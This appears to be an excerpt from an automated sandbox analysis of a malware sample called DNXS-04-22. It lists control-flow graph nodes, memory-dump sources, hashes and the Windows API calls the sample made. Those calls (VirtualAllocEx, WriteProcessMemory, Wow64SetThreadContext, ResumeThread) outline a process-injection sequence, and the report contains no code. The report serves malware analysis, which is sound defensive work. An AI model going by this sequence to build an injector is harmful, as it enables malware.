                                                                control_flow_graph 1843 5e51264-5e542ec 1847 5e542f2-5e542f7 1843->1847 1848 5e5439c-5e543bc call 5e5113c 1843->1848 1850 5e542f9-5e54330 1847->1850 1851 5e5434a-5e54382 CallWindowProcW 1847->1851 1855 5e543bf-5e543cc 1848->1855 1858 5e54332-5e54338 1850->1858 1859 5e54339-5e54348 1850->1859 1853 5e54384-5e5438a 1851->1853 1854 5e5438b-5e5439a 1851->1854 1853->1854 1854->1855 1858->1859 1859->1855
                                                                APIs
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E54371
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: CallProcWindow
                                                                • String ID:
                                                                • API String ID: 2714655100-0
                                                                • Opcode ID: 7e69d8fd955c52463f316610eb241ca80ff55ae3ac5867c6777ae21c18f41150
                                                                • Instruction ID: 4d66d2a0a4ca3a6fc76aca0743044ef53dd546f801e7e49d5cef197bcee65dab
                                                                • Opcode Fuzzy Hash: 7e69d8fd955c52463f316610eb241ca80ff55ae3ac5867c6777ae21c18f41150
                                                                • Instruction Fuzzy Hash: FA410974A003098FDB14CF99D488BAAFBF5FF88324F258459D959AB361D774A841CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1861 2c544c4-2c559d9 CreateActCtxA 1864 2c559e2-2c55a3c 1861->1864 1865 2c559db-2c559e1 1861->1865 1872 2c55a3e-2c55a41 1864->1872 1873 2c55a4b-2c55a4f 1864->1873 1865->1864 1872->1873 1874 2c55a51-2c55a5d 1873->1874 1875 2c55a60-2c55a90 1873->1875 1874->1875 1879 2c55a42-2c55a4a 1875->1879 1880 2c55a92-2c55b14 1875->1880 1879->1873 1883 2c559cf-2c559d9 1879->1883 1883->1864 1883->1865
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 02C559C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 1860b01f6d194a4d371c7d3f59ca7210c9b71c941d74e2a00ba03a50bbd08337
                                                                • Instruction ID: 8e6e833f089ed67e746c9c0ca5b39531856c63a8ec6e9cf45534fa0243f0edba
                                                                • Opcode Fuzzy Hash: 1860b01f6d194a4d371c7d3f59ca7210c9b71c941d74e2a00ba03a50bbd08337
                                                                • Instruction Fuzzy Hash: BE41E271D00719CFDB24DFA9C884B9EBBB5FF84704F60806AD508AB251DB756945CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1884 2c5590d-2c559d9 CreateActCtxA 1886 2c559e2-2c55a3c 1884->1886 1887 2c559db-2c559e1 1884->1887 1894 2c55a3e-2c55a41 1886->1894 1895 2c55a4b-2c55a4f 1886->1895 1887->1886 1894->1895 1896 2c55a51-2c55a5d 1895->1896 1897 2c55a60-2c55a90 1895->1897 1896->1897 1901 2c55a42-2c55a4a 1897->1901 1902 2c55a92-2c55b14 1897->1902 1901->1895 1905 2c559cf-2c559d9 1901->1905 1905->1886 1905->1887
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 02C559C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: c972dfc1560b2feb631344338db3656686d348f703e14631b98c7004d4ed2d03
                                                                • Instruction ID: 5d1c6dda64645e30b5428b91f1a8aa40d0a769c91f6ad9d60cffd0fd1fefe976
                                                                • Opcode Fuzzy Hash: c972dfc1560b2feb631344338db3656686d348f703e14631b98c7004d4ed2d03
                                                                • Instruction Fuzzy Hash: 0C41F2B1D00719CFEB24DFA9C884B9DBBF5BF88704F60806AD508AB250DB756946CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1906 75bd7d8-75bd82e 1909 75bd83e-75bd87d WriteProcessMemory 1906->1909 1910 75bd830-75bd83c 1906->1910 1912 75bd87f-75bd885 1909->1912 1913 75bd886-75bd8b6 1909->1913 1910->1909 1912->1913
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 075BD870
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: 124f90b3e66f0d1b3bcd8b9975f692d3c82fc33cec1ad7c760a29c1aae28272d
                                                                • Instruction ID: 23fb0ffd5fbfda827ba863636274f27723873d07c2269046a21ea1bb29d6fbaa
                                                                • Opcode Fuzzy Hash: 124f90b3e66f0d1b3bcd8b9975f692d3c82fc33cec1ad7c760a29c1aae28272d
                                                                • Instruction Fuzzy Hash: E7214BB19003099FDB10CFA9C881BEEBBF5FF48310F108429E958A7340C7789545CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1917 75bd7e0-75bd82e 1919 75bd83e-75bd87d WriteProcessMemory 1917->1919 1920 75bd830-75bd83c 1917->1920 1922 75bd87f-75bd885 1919->1922 1923 75bd886-75bd8b6 1919->1923 1920->1919 1922->1923
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 075BD870
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: f1b0bce767ec1e70c05027f6b620ced9d94684e94ee410b7b65def6d50fedbed
                                                                • Instruction ID: 05ff06b84209f19e6ce4f30299e86f4533af937d6d109666e6242f2967c456dc
                                                                • Opcode Fuzzy Hash: f1b0bce767ec1e70c05027f6b620ced9d94684e94ee410b7b65def6d50fedbed
                                                                • Instruction Fuzzy Hash: 20213BB5D003099FDB10DFA9C8857EEBBF5FF48310F10842AE958A7240C7799544DB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1927 75bd640-75bd693 1930 75bd6a3-75bd6d3 Wow64SetThreadContext 1927->1930 1931 75bd695-75bd6a1 1927->1931 1933 75bd6dc-75bd70c 1930->1933 1934 75bd6d5-75bd6db 1930->1934 1931->1930 1934->1933
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075BD6C6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: cde4981aa7325827088289d49167f139cee5bc35908bb20e44501e8b2b2a6db5
                                                                • Instruction ID: 420184ce368ce7355e4d702d9585efbdecdf1f6477c53f741c2910464b8ce046
                                                                • Opcode Fuzzy Hash: cde4981aa7325827088289d49167f139cee5bc35908bb20e44501e8b2b2a6db5
                                                                • Instruction Fuzzy Hash: 44216AB59007498FDB10DFAAC4857EEBBF4FF88310F14842AD559A7240DB789945CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1938 2c5b034-2c5d69c DuplicateHandle 1940 2c5d6a5-2c5d6c2 1938->1940 1941 2c5d69e-2c5d6a4 1938->1941 1941->1940
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C5D5CE,?,?,?,?,?), ref: 02C5D68F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 24cb298edda1cf250a2e8555e6984c62d3e815448ab1acc0744c4a26eb481141
                                                                • Instruction ID: 27265741936a5d602bb2c81da4eada34eb685b843cff9745b315a831cf3b90a1
                                                                • Opcode Fuzzy Hash: 24cb298edda1cf250a2e8555e6984c62d3e815448ab1acc0744c4a26eb481141
                                                                • Instruction Fuzzy Hash: 892116B59003099FDB10CF9AD484ADEFBF8FB48310F10841AE958A3350D378A955CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075BD950
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: 18cac0423b85ca5f6ae80c1f6147c6f1181c606cd581fcb2dbeb91cea4b42e9b
                                                                • Instruction ID: 7c3223e7ceebc65d62632881d77752a055208960e091adc653eaa4df21c7d608
                                                                • Opcode Fuzzy Hash: 18cac0423b85ca5f6ae80c1f6147c6f1181c606cd581fcb2dbeb91cea4b42e9b
                                                                • Instruction Fuzzy Hash: 65213B719003499FDB10DFAAC8807EEBBF5FF48310F108429E958A7240D7759901DFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C5D5CE,?,?,?,?,?), ref: 02C5D68F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 75cae0538f284270b79c3988d5e5c612c08e72005a5ce229e84aa585f6504ba0
                                                                • Instruction ID: aae0c7c27d405ed4272258563936220204988d088940c503f444003ff8c621d1
                                                                • Opcode Fuzzy Hash: 75cae0538f284270b79c3988d5e5c612c08e72005a5ce229e84aa585f6504ba0
                                                                • Instruction Fuzzy Hash: DC21E5B59003099FDB10CFAAD984ADEBBF4FB48310F14841AE958A3350D774A955CF65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075BD6C6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 95e1be8cb4eb41ba7e9002aa6da80bc99ee69aa8abd018e1641c370780e096eb
                                                                • Instruction ID: 22bfcdbd851b0ab48c78debb39d6b134f155c3af53946f357aeecdb6110c16e4
                                                                • Opcode Fuzzy Hash: 95e1be8cb4eb41ba7e9002aa6da80bc99ee69aa8abd018e1641c370780e096eb
                                                                • Instruction Fuzzy Hash: 262138B19007098FDB20DFAAC4857EEBBF4FF88320F14842AD559A7240CB789945CFA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075BD950
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: faed38da1a2c04b74ba827f0ca6a98976da09a964cff9cd5be46a26c75e4d9f2
                                                                • Instruction ID: 9537fd747a72016c9253dc276960888a88623fab9fd593ac2624f1e1e6dfa016
                                                                • Opcode Fuzzy Hash: faed38da1a2c04b74ba827f0ca6a98976da09a964cff9cd5be46a26c75e4d9f2
                                                                • Instruction Fuzzy Hash: A92128B190034A9FDB10DFAAC880BEEBBF5FF48310F10842AE958A7240C7799504DBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075BD78E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 24c5e8440949414d3da543cf978c7272b71daf82d8c9440fc8a74a885f94af63
                                                                • Instruction ID: abc9ed2c4bc5e2c6deec5358bd483ff984596af670ec6217e2e88d84c82a7bee
                                                                • Opcode Fuzzy Hash: 24c5e8440949414d3da543cf978c7272b71daf82d8c9440fc8a74a885f94af63
                                                                • Instruction Fuzzy Hash: D221897590034A9FCB20DFAAC844BEEBBF5FF88320F248819E559A7250C7759504DFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C5B419,00000800,00000000,00000000), ref: 02C5B60A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 74b6c737d1d8b4413b062bdbf52ea89db860ffdc1a7f0d70fa7e23471d287987
                                                                • Instruction ID: 98a6e6cebb1b95c5dd36f4c97d3d02105bcffed4723a0bacd48dde5354707976
                                                                • Opcode Fuzzy Hash: 74b6c737d1d8b4413b062bdbf52ea89db860ffdc1a7f0d70fa7e23471d287987
                                                                • Instruction Fuzzy Hash: 091126B69003098FDB14CF9AD444BDEFBF4EB88314F10842EE919A7210C775A945CFA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C5B419,00000800,00000000,00000000), ref: 02C5B60A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 159b66cbd8fbc586967b74e0303882f173434ad5a5ff4822e02757f01c6769b7
                                                                • Instruction ID: 34d31e7bcd4cc25ee588b8e98924053a067b2d738ede554fd96cc27d96278874
                                                                • Opcode Fuzzy Hash: 159b66cbd8fbc586967b74e0303882f173434ad5a5ff4822e02757f01c6769b7
                                                                • Instruction Fuzzy Hash: BF11E4B69003099FDB14CFAAC444BDEFBF4EB88714F14841AE919A7240C775A545CFA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075BD78E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 1d0747148840e090079a9188553b2a72c2d7bc664748773ed2dea388cbe581d8
                                                                • Instruction ID: 1ba81f020eb5a8096bffd100acdb0fcb50df7977194c28ca2b51595ecb9d315d
                                                                • Opcode Fuzzy Hash: 1d0747148840e090079a9188553b2a72c2d7bc664748773ed2dea388cbe581d8
                                                                • Instruction Fuzzy Hash: 8111377590034A9FDB20DFAAC844BEEBBF5FF88720F148819E519A7250C7799544DFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 0999aeecbf769e7059030ab81fac403306626a2210a1d3878ba647f17f0ff3d2
                                                                • Instruction ID: feb177c5b280295c6b464ed0ff631cfd15c8add92c07ae6aef2119cb1ca6e763
                                                                • Opcode Fuzzy Hash: 0999aeecbf769e7059030ab81fac403306626a2210a1d3878ba647f17f0ff3d2
                                                                • Instruction Fuzzy Hash: 39118BB49007498FDB20DFAAC4447EEFBF4AF88720F208429D519A7340D735A441CFA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 6a2507b7f5044bb55c6025eacfd5a92c045991891a2d6f2db95bcca565fc6b0e
                                                                • Instruction ID: 25f01e371dcd84fcc6300cc38d146ce41600aeba042d248c138b0fefe782c3b6
                                                                • Opcode Fuzzy Hash: 6a2507b7f5044bb55c6025eacfd5a92c045991891a2d6f2db95bcca565fc6b0e
                                                                • Instruction Fuzzy Hash: F31158B19003498FDB20DFAAC4457EEFBF4AB88720F208819D519A7240CB75A504CFA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02C5B39E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 5b039bf71264c30589e8668bd082fb2d151fe2b1e299c5513fb28ab8b10143ee
                                                                • Instruction ID: a124cd35e308f78dba8a90fc35c85cb57cd7cce63c24e8e9eaf12989257f12be
                                                                • Opcode Fuzzy Hash: 5b039bf71264c30589e8668bd082fb2d151fe2b1e299c5513fb28ab8b10143ee
                                                                • Instruction Fuzzy Hash: 37110FB5C003498FCB20CF9AC444A9EFBF4EB88324F10845AD819B7210C779A545CFA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • PostMessageW.USER32(?,?,?,?), ref: 07FDFD25
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1368179797.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7fd0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID:
                                                                • API String ID: 410705778-0
                                                                • Opcode ID: 0c65ee20db73a4f0cc68ae20072929feaaac5fb454d011d4b76d2b720da82580
                                                                • Instruction ID: fc1fe343f917493f66bb74bcda81baba2a40f561f5a3c73cc437dd7454979477
                                                                • Opcode Fuzzy Hash: 0c65ee20db73a4f0cc68ae20072929feaaac5fb454d011d4b76d2b720da82580
                                                                • Instruction Fuzzy Hash: 071115B58003499FDB20DF9AD884BDEFBF8FB48320F148419E918A7240C375A944CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d184a36ab76ded1554c7b62baf8cd1bdce51442bf9a4863187bf15d09850f33
                                                                • Instruction ID: 14a365a28a26ac9b4d6eabfb26f1ba4ddfb9e673a4aa7ffc6e03a80fb3431141
                                                                • Opcode Fuzzy Hash: 8d184a36ab76ded1554c7b62baf8cd1bdce51442bf9a4863187bf15d09850f33
                                                                • Instruction Fuzzy Hash: 6362E1F4D00F878BDB749F7584483BD7AA1AB42384F284A2ED0FACB260D7399545CB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80565cbdcae6c84d91ac0530c80d260a60d4a1385548bb3ae418668aabb97ca6
                                                                • Instruction ID: 19a53cf113038f97ae91dee1531cf0f7835bf2f4cd0997eaf6958d45f3bfd70d
                                                                • Opcode Fuzzy Hash: 80565cbdcae6c84d91ac0530c80d260a60d4a1385548bb3ae418668aabb97ca6
                                                                • Instruction Fuzzy Hash: 1D226EF4D05FC34ADB749B7494843BDBAA0AB063D4F284A5BD0FACB261C7389185CB49
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14530bb5fec3dea55063e4e0b60b7facaebe4fdba6ce4d69eaf5cc363b625586
                                                                • Instruction ID: b03add022d0a223f6bfd7a1cb29bd38a89f56b47c59a651b3e5b08cffe6051f0
                                                                • Opcode Fuzzy Hash: 14530bb5fec3dea55063e4e0b60b7facaebe4fdba6ce4d69eaf5cc363b625586
                                                                • Instruction Fuzzy Hash: 0381E078710610CFCB14EF28D498D6A7BF6BF89A15B1641A9E902CB371DBB1EC41CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3797801877a3974209922cd85e335a7eb131545046f3cf5f57ba61e5df09b207
                                                                • Instruction ID: 046d4ee45a94df60b5e87c9895a6eb003cd77f8f57df206b86db7a45ecb67d15
                                                                • Opcode Fuzzy Hash: 3797801877a3974209922cd85e335a7eb131545046f3cf5f57ba61e5df09b207
                                                                • Instruction Fuzzy Hash: 55714B75B002198FCB15EBA4D5949AEB7F2FF89250B2444A9E446EB3A0CB35DC41CF71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f06f76097eac3032ffcf89ac6621ae67e559d3d59e49c319c3016a4d5684969
                                                                • Instruction ID: 768096d61db6e31aa621ea2c34f5940c9210357fd9c3853dec4f2a48a38b9efe
                                                                • Opcode Fuzzy Hash: 9f06f76097eac3032ffcf89ac6621ae67e559d3d59e49c319c3016a4d5684969
                                                                • Instruction Fuzzy Hash: 1E718DB4A01249EFCB15DF69D884DAEBBB6BF49710B154098F901AB361DB31EC81CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee742d034f587760d6a901d41445ceb42a9f067cdd414b5977edf4baf2d8873c
                                                                • Instruction ID: 3dc7932b5ef642f9010041b6dcf1a5b7df79be17f6e4ce6dbe1f9588efbf27d5
                                                                • Opcode Fuzzy Hash: ee742d034f587760d6a901d41445ceb42a9f067cdd414b5977edf4baf2d8873c
                                                                • Instruction Fuzzy Hash: E5519E71E1020A8FDB14DBA9D854AEEBBF2FF88710F248166E405BB244DB719C41CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d8e2b9414bd5cfceaa41860dec65332214814635d7e9028213caab34f09e4d50
                                                                • Instruction ID: 437032af1e9ea14aabf374c02dc7a59f60018518b4b9a85dc387518a1e2473ae
                                                                • Opcode Fuzzy Hash: d8e2b9414bd5cfceaa41860dec65332214814635d7e9028213caab34f09e4d50
                                                                • Instruction Fuzzy Hash: 645123B1A04211DFD715EB38D0142ADBBA2FFC5300F1C856AE04ADBB50CB35AC96CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b19d65679a198648790509461ce95e4fe3c1f3d8d59d4c86acf0007f336c4491
                                                                • Instruction ID: 5344c032a0275756983403e19576b4c51801253b83fe768c28cf510a49286485
                                                                • Opcode Fuzzy Hash: b19d65679a198648790509461ce95e4fe3c1f3d8d59d4c86acf0007f336c4491
                                                                • Instruction Fuzzy Hash: 7E51F2716003118FC715AF79D4946AEBBF6FF89210F1884AAE40ADB3A1CB71DC44CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
